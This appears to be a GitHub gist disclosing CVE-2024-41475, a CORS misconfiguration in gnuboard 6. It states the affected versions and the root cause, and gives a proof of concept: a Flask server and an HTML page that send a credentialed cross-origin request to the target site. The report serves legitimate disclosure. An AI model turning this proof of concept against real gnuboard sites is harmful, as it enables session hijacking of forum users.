Skip to content

Instantly share code, notes, and snippets.

@AkiaCode

AkiaCode/CVE-2024-41475.md

Last active August 19, 2024 05:03
Show Gist options
  • Save AkiaCode/7c878b1699931314246d6589d86b1e89 to your computer and use it in GitHub Desktop.
Save AkiaCode/7c878b1699931314246d6589d86b1e89 to your computer and use it in GitHub Desktop.
Download ZIP
Gunboard 6 CORS Misconfiguration Vulnerability Report
Raw
CVE-2024-41475.md

[Name of affected Product]

  • gnuboard 6

[Affected version]

  • b9b6bb7, 6.0.7

[Vulnerability Type]

  • CORS Misconfiguration (CWE-942)

[Root Cause]

  • In Gnuboard 6 CORS settings, if allow_credentials is set to True, allow_origins should not be set to allow all. However, if it is set to allow all, session hijacking can be possible.

[Attack Vectors]

video.mp4
Clicking on malicious links in the forum could result in the user's session being hijacked due to a CORS misconfiguration.

[PoC]

from flask import Flask, jsonify, send_from_directory

app = Flask(__name__)

@app.route('/')
def serve_html():
    return send_from_directory('', 'index.html')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8800)
<html>
<body>
    <div id="demo">
        <button type="button" onclick="cors()">Exploit</button>
    </div>
    <script>
        function cors() {
            var xhr = new XMLHttpRequest();
            xhr.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    var cookies = document.cookie;
                    document.getElementById("demo").innerText = "Cookies: " + cookies;
                    alert("Cookies: " + cookies);

                }
            };
            xhr.open("GET", "<gunboardUrl>", true);
            xhr.withCredentials = true;
            xhr.send();
        }
    </script>
</body>
</html>
@AkiaCode
Copy link
Author

CVE-2024-41475, GHSA-6phv-2frh-h52x

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment